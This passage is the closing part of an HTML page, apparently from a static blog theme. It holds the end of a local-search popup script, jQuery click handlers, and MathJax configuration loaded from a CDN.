                str += "</ul>";
                if (matchcounts == 0) { str = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>' }
                if (keywords == "") { str = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>' }
                $resultContent.innerHTML = str;
            });
            proceedsearch();
        }
    });}

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched == false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };

    });

    $('.popup-btn-close').click(function(e){
      $('.popup').hide();
      $(".popoverlay").remove();
      $('body').css('overflow', '');
    });
    $('.popup').click(function(e){
      e.stopPropagation();
    });
  </script>


  
  <script type="text/x-mathjax-config">
    MathJax.Hub.Config({
      tex2jax: {
        inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
        processEscapes: true,
        skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
      }
    });
  </script>

  <script type="text/x-mathjax-config">
    MathJax.Hub.Queue(function() {
      var all = MathJax.Hub.getAllJax(), i;
      for (i=0; i < all.length; i += 1) {
        all[i].SourceElement().parentNode.className += ' has-jax';
      }
    });
  </script>
  <script type="text/javascript" src="//cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>


  

  

</body>
</html>
